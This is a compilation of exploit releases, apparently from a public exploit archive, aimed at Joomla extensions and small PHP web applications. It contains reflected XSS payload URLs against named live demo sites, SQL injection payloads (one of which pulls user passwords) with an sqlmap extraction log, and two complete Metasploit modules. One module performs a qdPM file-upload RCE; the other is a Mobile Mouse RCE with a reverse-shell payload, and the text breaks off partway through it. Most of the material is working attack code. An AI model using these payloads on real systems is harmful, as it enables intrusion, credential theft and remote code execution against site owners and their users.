<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : softPHP │<br />│ Software : jCart for OpenCart 3.0.3.19 - Reflected XSS │<br />│ jCart is a standalone Joomla ecommerce component which includes OpenCart │<br />│ features │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'Itemid' is vulnerable to XSS<br /><br />http://demos.soft-php.com/jcart/index.php?option=com_jcart&Itemid=1091712';confirm(1)//274&route=product/search<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : JoomBoost │<br />│ Software : JoomRecipe 4.2.2 Extension for Joomla - Reflected XSS │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'withIngredients%5B%5D' is vulnerable to XSS<br /><br />https://joomrecipe-demo.joomboost.com/search-recipes/search/results.html?searchPerformed=1&&withIngredients%5B%5D=hpf5w"><script>alert(1)</script>u7d68fi0pz1<br /><br />GET parameter 'withoutIngredients%5B%5D' is vulnerable to XSS<br /><br />https://joomrecipe-demo.joomboost.com/search-recipes/search/results.html?searchPerformed=1&withoutIngredients%5B%5D=ucc8c"><script>alert(1)</script>lylajy83wro<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::PhpEXE<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)',<br /> 'Description' => %q{<br /> A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier.<br /> An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal<br /> vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection.<br /> NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Rishal Dwivedi (Loginsoft)', # Discovery<br /> 'Leon Trappett (thepcn3rd)', # PoC<br /> 'Giacomo Casoni' # Metasploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2020-7246'],<br /> ['EDB', '50175']<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => "\x00"<br /> },<br /> 'DefaultOptions' => {<br /> 'EXITFUNC' => 'thread'<br /> },<br /> 'Platform' => %w[linux php],<br /> 'Targets' => [<br /> [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],<br /> [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],<br /> [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],<br /> [ 'Windows x86', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],<br /> [ 'Windows x64', { 'Arch' => ARCH_X64, 'Platform' => 'win' } ]<br /> ],<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2020-11-21',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => ['CRASH_SAFE'],<br /> 'Reliability' => 
['IOC_IN_LOGS'],<br /> 'SideEffects' => ['REPEATABLE_SESSION']<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The base directory where qdPM resides', '/']),<br /> OptString.new('EMAIL', [true, 'The email to login with']),<br /> OptString.new('PASSWORD', [true, 'The password to login with'])<br /> ]<br /> )<br /><br /> self.needs_cleanup = true<br /> end<br /><br /> def check<br /> uri = normalize_uri(uri, '/index.php')<br /> res = send_request_raw({ 'uri' => uri })<br /> if res.nil?<br /> return Exploit::CheckCode::Unknown<br /> end<br /><br /> login_page = res.get_html_document<br /> begin<br /> version_num = login_page.at('div[@class="copyright"]').at('a').text.tr('qdPM ', '').to_f<br /> rescue StandardError<br /> return Exploit::CheckCode::Unknown<br /> end<br /> version = Rex::Version.new(version_num)<br /> if version <= Rex::Version.new('9.1')<br /> return Exploit::CheckCode::Appears<br /> else<br /> return Exploit::CheckCode::Safe<br /> end<br /> end<br /><br /> def get_write_exec_payload_win(fname, _data)<br /> p = Rex::Text.encode_base64(generate_payload_exe)<br /> php = %|<br /> <?php<br /> $f = fopen("#{fname}", "wb");<br /> fwrite($f, base64_decode("#{p}"));<br /> fclose($f);<br /> exec("C:\\Windows\\System32\\cmd.exe /c #{fname}");<br /> ?><br /> |<br /> php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')<br /> return php<br /> end<br /><br /> def login(base, username, password)<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri("#{base}/index.php/login"),<br /> 'keep_cookies' => true<br /> })<br /> login_page = res.get_html_document<br /> csrf_token = login_page.at("input[name='login[_csrf_token]']/@value")<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri("#{base}/index.php/login"),<br /> 'vars_post' => {<br /> 'login[email]' => username,<br /> 'login[password]' => password,<br /> 'login[_csrf_token]' => csrf_token<br /> },<br /> 
'keep_cookies' => true,<br /> 'headers' => {<br /> 'Origin' => "http://#{rhost}",<br /> 'Referer' => "http://#{rhost}/#{base}/index.php/login"<br /> }<br /> })<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri("#{base}/index.php/myAccount"),<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Host' => rhost.to_s<br /> }<br /> })<br /> account_page = res.get_html_document<br /> begin<br /> userid = account_page.at("input[@name='users[id]']/@value").text.strip<br /> rescue StandardError<br /> print_error('The designated admin account does not have a user ID.')<br /> return {}<br /> end<br /> username = account_page.at("input[@name='users[name]']/@value").text.strip<br /> csrftoken_ = account_page.at("input[@name='users[_csrf_token]']/@value").text.strip<br /> opts = {<br /> 'user_id' => userid,<br /> 'name' => username,<br /> 'csrf_token' => csrftoken_<br /> }<br /> return opts<br /> end<br /><br /> def upload_php(base, opts)<br /> fname = opts['filename']<br /> php_payload = opts['data']<br /> user_id = opts['user_id']<br /> email = opts['email']<br /> csrf_token = opts['csrf_token']<br /><br /> data = [<br /> { 'name' => 'sf_method', 'data' => 'put' },<br /> { 'name' => 'users[id]', 'data' => user_id },<br /> { 'name' => 'users[photo_preview]', 'data' => '.htaccess' },<br /> { 'name' => 'users[_csrf_token]', 'data' => csrf_token },<br /> { 'name' => 'users[new_password]', 'data' => '' },<br /> { 'name' => 'users[email]', 'data' => email },<br /> { 'name' => 'extra_fields[9]', 'data' => '' },<br /> { 'name' => 'users[remove_photo]', 'data' => '1' }<br /> ]<br /><br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri("#{base}/index.php/myAccount/update"),<br /> 'vars_form_data' => data,<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Origin' => "http://#{rhost}",<br /> 'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"<br /> }<br /> )<br /><br /> data = [<br /> { 'name' => 
'sf_method', 'data' => 'put' },<br /> { 'name' => 'users[id]', 'data' => user_id },<br /> { 'name' => 'users[photo_preview]', 'data' => '../.htaccess' },<br /> { 'name' => 'users[_csrf_token]', 'data' => csrf_token },<br /> { 'name' => 'users[new_password]', 'data' => '' },<br /> { 'name' => 'users[email]', 'data' => email },<br /> { 'name' => 'extra_fields[9]', 'data' => '' },<br /> { 'name' => 'users[remove_photo]', 'data' => '1' }<br /> ]<br /><br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri("#{base}/index.php/myAccount/update"),<br /> 'vars_form_data' => data,<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Origin' => "http://#{rhost}",<br /> 'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"<br /> }<br /> )<br /><br /> data = [<br /> { 'name' => 'sf_method', 'data' => 'put' },<br /> { 'name' => 'users[id]', 'data' => user_id },<br /> { 'name' => 'users[_csrf_token]', 'data' => csrf_token },<br /> { 'name' => 'users[new_password]', 'data' => '' },<br /> { 'name' => 'users[email]', 'data' => email },<br /> { 'name' => 'extra_fields[9]', 'data' => '' },<br /> { 'name' => 'users[remove_photo]', 'data' => '1' },<br /> { 'name' => 'users[photo]', 'data' => php_payload, 'mime_type' => 'application/octet-stream', 'filename' => fname }<br /> ]<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri("#{base}/index.php/myAccount/update"),<br /> 'vars_form_data' => data,<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Origin' => "http://#{rhost}",<br /> 'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"<br /> }<br /> })<br /><br /> return res.code == 302<br /> end<br /><br /> def exec_php(base, _opts)<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri("#{base}/index.php/myAccount"),<br /> 'keep_cookies' => true<br /> })<br /> home_page = res.get_html_document<br /> backdoor = home_page.at("//input[@name='users[photo_preview]']/@value").text.strip<br /> 
register_file_for_cleanup(backdoor)<br /> send_request_cgi({<br /> 'uri' => normalize_uri("#{base}/uploads/users/#{backdoor}")<br /> })<br /> end<br /><br /> def exploit<br /> uri = normalize_uri(target_uri.path)<br /> user = datastore['EMAIL']<br /> pass = datastore['PASSWORD']<br /> print_status("Attempt to login with '#{user}:#{pass}'")<br /> opts = login(uri, user, pass)<br /> if opts.empty?<br /> print_error('Login unsuccessful or bad (admin) user')<br /> return<br /> end<br /><br /> php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"<br /> case target['Platform']<br /> when 'php'<br /> p = get_write_exec_payload<br /> when 'linux'<br /> p = get_write_exec_payload(unlink_self: true)<br /> when 'win'<br /> bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"<br /> bin = generate_payload_exe<br /> p = get_write_exec_payload_win(bin_name.to_s, bin)<br /> print_warning("#{bin_name} will require manual cleanup")<br /> end<br /><br /> print_status("Uploading PHP payload (#{p.length} bytes)...")<br /> data = {<br /> 'email' => user.to_s,<br /> 'filename' => php_fname,<br /> 'data' => p<br /> }<br /> data = data.merge(opts)<br /> uploader = upload_php(uri, data)<br /> if !uploader<br /> print_error('Unable to upload')<br /> return<br /> end<br /><br /> print_status("Executing '#{php_fname}'")<br /> exec_php(uri, opts)<br /> end<br />end<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : JULOA │<br />│ Software : AdsManager 3.2.0 Extension for Joomla │<br />│ Vuln Type: SQL Injection │<br />│ Method : POST │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />POST parameter 'ad_vectormap' is vulnerable<br /><br />---<br />Parameter: ad_vectormap (POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') RLIKE (SELECT (CASE WHEN (8892=8892) THEN '' ELSE 0x28 END))-- TnXM&advsearch=0&new_search=1<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 2373 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(2373=2373,1))),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- lAQM&advsearch=0&new_search=1<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 4095 FROM (SELECT(SLEEP(5)))TLzG)-- UmxX&advsearch=0&new_search=1<br />---<br /><br /><br />[+] Starting the Attack<br /><br /><br />[INFO] fetching current database<br /><br />the back-end DBMS is MySQL<br />web application technology: PHP 7.4.30, Nginx<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br /><br />current database: 'c1demosource'<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Bus Pass Management System 1.0 - 'searchdata' Cross-Site Scripting (XSS)<br /># Date: 2022-07-02<br /># Exploit Author: Ali Alipour<br /># Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql<br /># Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip<br /># Version: 1.0<br /># Tested on: Windows 10 Pro x64 - XAMPP Server<br /># CVE : N/A<br /><br /><br />#Issue Detail:<br /><br />The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response.<br /><br />This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.<br /><br /># Vulnerable page: /buspassms/download-pass.php<br /><br /># Vulnerable Parameter: searchdata [ POST Data ]<br /><br />#Request : <br /><br />POST /buspassms/download-pass.php HTTP/1.1<br />Host: 127.0.0.1<br />Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3<br />Origin: https://127.0.0.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Upgrade-Insecure-Requests: 1<br />Referer: https://127.0.0.1/buspassms/download-pass.php<br />Content-Type: application/x-www-form-urlencoded<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Content-Length: 25<br /><br />searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=<br /><br /><br /><br />#Response : <br /><br />HTTP/1.1 200 OK<br />Date: Fri, 01 Jul 2022 00:14:25 GMT<br />Server: Apache/2.4.43 
(Win64) OpenSSL/1.1.1g PHP/7.4.8<br />X-Powered-By: PHP/7.4.8<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 6425<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /><title>Bus Pass Management System || Pass Page</title><br /><br /><script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba<br />...[SNIP]...<br /><h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4><br />...[SNIP]...<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Online Examination System - SQL Injection<br /># Google Dork: N/A<br /># Date: 2022-9-28<br /># Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11<br /># Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/<br /># Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip<br /># Tested on: windows 11 - XAMPP<br /># CVE : N/A<br /># Version: 1.0<br /><br />Vulnerability Details<br />======================<br /><br />Steps:<br /><br />Vulnerable code in file account.php:<br /><br /><?php<br />if(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {<br />$eid=@$_GET['eid'];<br />$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );<br />echo '<div class="panel" style="margin:5%">';<br />while($row=mysqli_fetch_array($q) )<br />?><br /><br />1) Log in to the application after registering a new user<br /><br />Inject payload into parameter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Ossolution Team │<br />│ Software : EDocman 1.23.3 Extension for Joomla - Reflected XSS │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'filter_search' is vulnerable to XSS<br /><br />Path: index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=[XSS]<br /><br />https://joomdonationdemo.com/edocman/index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=ekmj6"onfocus="alert(1)"autofocus="fjozn<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Online Examination System - Cross-Site Scripting (Reflected)<br /># Google Dork: N/A<br /># Date: 2022-9-29<br /># Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11<br /># Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/<br /># Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip<br /># Tested on: windows 11 - XAMPP<br /># CVE : N/A<br /># Version: 1.0<br /><br />Vulnerability Details<br />======================<br /><br />Steps:<br /><br />Vulnerable code in file index.php:<br /><br />157 <?php if(@$_GET['q7'])<br />158 { echo'<p style="color:red;font-size:15px;">'.@$_GET['q7'];}?><br /><br />http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3E<br /><br />Inject payload into parameter q7<br /></code></pre>
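The two Online Examination System advisories above quote the raw SQL interpolation in account.php and the raw echo in index.php. As an added example (not code from the project or from the advisory author), here are hardened versions of both call sites; it assumes `$con` is the application's mysqli connection, `$sn` is the question number the original query already references, that exam ids look like the hex string in the advisory, and a `question` column (a hypothetical name, since the original uses `SELECT *`).

```php
<?php
// Added example, not code from the Online Examination System project:
// hardened versions of the two snippets quoted in the advisories above.
//
// Assumptions: $con is the mysqli connection the original account.php uses;
// $sn is the question serial number the original query already references;
// the questions table has a column named "question" (hypothetical name).

declare(strict_types=1);

/**
 * Fix for the account.php SQL injection. The original builds the query with
 * "... WHERE eid='$eid' AND sn='$sn'", so a quote or UNION inside eid becomes
 * part of the SQL. A prepared statement sends values separately from the
 * query text, so the same input is compared as data and matches nothing.
 */
function fetch_questions(mysqli $con, string $eid, int $sn): array
{
    // Allow-list first (assumption: exam ids are short hex strings, like the
    // eid=5589741f9ed52 in the advisory); anything else never reaches the DB.
    if (!preg_match('/\A[0-9a-f]{1,32}\z/', $eid)) {
        return [];
    }

    $stmt = $con->prepare('SELECT * FROM questions WHERE eid = ? AND sn = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $con->error);
    }
    $stmt->bind_param('si', $eid, $sn);   // s = string, i = integer
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

/**
 * Fix for the index.php reflected XSS. The original echoes $_GET['q7'] into
 * the page unchanged. Encoding for the HTML text context turns < > " ' and &
 * into entities, so the browser renders the input as text instead of markup.
 */
function html_text(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// --- the two call sites, rewritten to use the helpers above -----------------

// account.php, step 2 of the quiz flow (no @-suppression: check the keys instead)
if (isset($_GET['q'], $_GET['step']) && $_GET['q'] === 'quiz' && (int) $_GET['step'] === 2) {
    $eid = (string) ($_GET['eid'] ?? '');
    $sn  = (int) ($_GET['sn'] ?? 1);       // assumption: sn arrives with the request
    echo '<div class="panel" style="margin:5%">';
    foreach (fetch_questions($con, $eid, $sn) as $row) {
        // every database value that reaches the page is encoded on output too
        echo '<p>' . html_text((string) $row['question']) . '</p>';
    }
    echo '</div>';
}

// index.php, the equivalent of the quoted lines 157-158
if (!empty($_GET['q7'])) {
    echo '<p style="color:red;font-size:15px;">' . html_text((string) $_GET['q7']) . '</p>';
}
```

With the payload from the index.php advisory, `"><script>alert("yousef");</script>`, `html_text()` returns `&quot;&gt;&lt;script&gt;alert(&quot;yousef&quot;);&lt;/script&gt;`, which the browser displays as literal text.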
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /><br /> include Exploit::Remote::Tcp<br /> include Exploit::EXE # generate_payload_exe<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Mobile Mouse RCE',<br /> 'Description' => %q{<br /> This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol<br /> to deploy a payload and run it from the server. This module will only deploy<br /> a payload if the server is set without a password (default).<br /> Tested against 3.6.0.4, current at the time of module writing<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'CHOKRI HAMMEDI' # edb<br /> ],<br /> 'References' => [<br /> [ 'EDB', '51010' ],<br /> [ 'URL', 'https://mobilemouse.com/' ],<br /> ],<br /> 'Arch' => [ ARCH_X64, ARCH_X86 ],<br /> 'Platform' => 'win',<br /> 'Stance' => Msf::Exploit::Stance::Aggressive,<br /> 'Targets' => [<br /> ['default', {}],<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => "\x04\x1E"<br /> },<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/shell/reverse_tcp'<br /> },<br /> 'DisclosureDate' => '2022-09-20',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK] # typing on screen<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptPort.new('RPORT', [true, 'Port Mobile Mouse runs on', 9099]),<br /> OptInt.new('SLEEP', [true, 'How long to sleep between commands', 3]),<br /> OptString.new('PATH', [true, 'Where to stage payload for pull method', 
'c:\\Windows\\Temp\\']),<br /> OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),<br /> ]<br /> )<br /> end<br /><br /> def path<br /> return datastore['PATH'] if datastore['PATH'].end_with? '\\'<br /><br /> "#{datastore['PATH']}\\"<br /> end<br /><br /> def connect_command<br /> connect_command = 'CONNECT' # 434F4E4E454354<br /> connect_command << "\x1E\x1E"<br /> connect_command << @client_name<br /> connect_command << "\x1E"<br /> connect_command << 'iPhone' # 6950686F6E65<br /> connect_command << "\x1E"<br /> # the next 2,2 may be a version number of some sort<br /> connect_command << '2' # 32<br /> connect_command << "\x1E"<br /> connect_command << '2' # 32<br /> connect_command << "\x1E\x04"<br /> sock.put(connect_command)<br /> sleep(datastore['SLEEP'])<br /> end<br /><br /> def open_command_prompt<br /> open_command_prompt = 'KEY' # 4b4559<br /> open_command_prompt << "\x1E"<br /> open_command_prompt << '114' # 313134 windows key?<br /> open_command_prompt << "\x1E"<br /> open_command_prompt << 'r' # 72<br /> open_command_prompt << "\x1E"<br /> open_command_prompt << 'OPT' # 4f5054<br /> open_command_prompt << "\x04"<br /> sock.put(open_command_prompt)<br /> sleep(datastore['SLEEP'])<br /> end<br /><br /> def script_content(payload)<br /> script_content = 'KEY' # 4B4559<br /> script_content << "\x1E"<br /> script_content << '100' # 313030<br /> script_content << "\x1E"<br /> script_content << payload<br /> script_content << "\x1E\x04"<br /> script_content << 'KEY' # 4B4559<br /> script_content << "\x1E"<br /> script_content << '-1' # 2d31<br /> script_content << "\x1E"<br /> script_content << 'ENTER' # 454e544552<br /> script_content << "\x1E\x04"<br /> sock.put(script_content)<br /> sleep(datastore['SLEEP'])<br /> end<br /><br /> def on_request_uri(cli, _req)<br /> p = generate_payload_exe<br /> send_response(cli, p)<br /> print_good("Payload request received, sending #{p.length} bytes of payload for staging")<br /> 
